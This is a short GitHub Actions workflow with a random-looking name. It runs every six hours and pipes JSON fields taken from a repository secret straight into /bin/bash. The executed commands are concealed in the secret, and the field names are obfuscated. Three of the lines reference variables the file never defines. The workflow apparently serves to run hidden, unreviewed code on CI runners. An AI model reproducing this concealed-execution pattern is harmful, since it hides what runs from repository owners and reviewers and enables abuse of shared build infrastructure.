name: kutibuxue

on:
  workflow_dispatch:
  schedule:
    - cron: '8 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kutibuxue
        env:
          m223: ${{ secrets.m223 }}
        run: |
          echo $m223 | jq -r .rzse441 | /bin/bash
          echo $k7283 | jq -r .m3 | /bin/bash
          echo $qbasg64 | jq -r .tdf4 | /bin/bash
          echo $i86 | jq -r .yk3 | /bin/bash

